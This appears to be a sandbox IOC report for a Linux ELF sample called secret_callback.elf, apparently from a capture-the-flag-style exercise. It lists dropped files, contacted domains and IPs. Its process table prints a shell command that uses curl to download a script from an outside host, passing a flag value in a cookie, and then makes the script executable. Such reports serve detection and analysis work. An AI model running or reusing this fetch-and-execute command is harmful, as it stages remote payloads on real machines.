IOC Report
secret_callback.elf

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| secret_callback.elf | ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, no section header | initial sample | malicious |
| /tmp/bins.sh | HTML document, ASCII text, with CRLF line terminators | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| /tmp/secret_callback.elf | /tmp/secret_callback.elf | |
| /bin/sh | /bin/sh -c "curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b 'result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D' -o /tmp/bins.sh 2>/dev/null && chmod +x /tmp/bins.sh" | |
| /bin/sh | - | |
| /usr/bin/curl | curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D -o /tmp/bins.sh | |

URLs

| Name | IP | Malicious |
|---|---|---|
| http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu | 94.26.90.14 | |

Domains

| Name | IP | Malicious |
|---|---|---|
| conn.masjesu.zip | 163.5.159.12 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 94.26.90.14 | unknown | Bulgaria | |
| 163.5.159.12 | conn.masjesu.zip | France | |
| 109.202.202.202 | unknown | Switzerland | |
| 91.189.91.43 | unknown | United Kingdom | |
| 91.189.91.42 | unknown | United Kingdom | |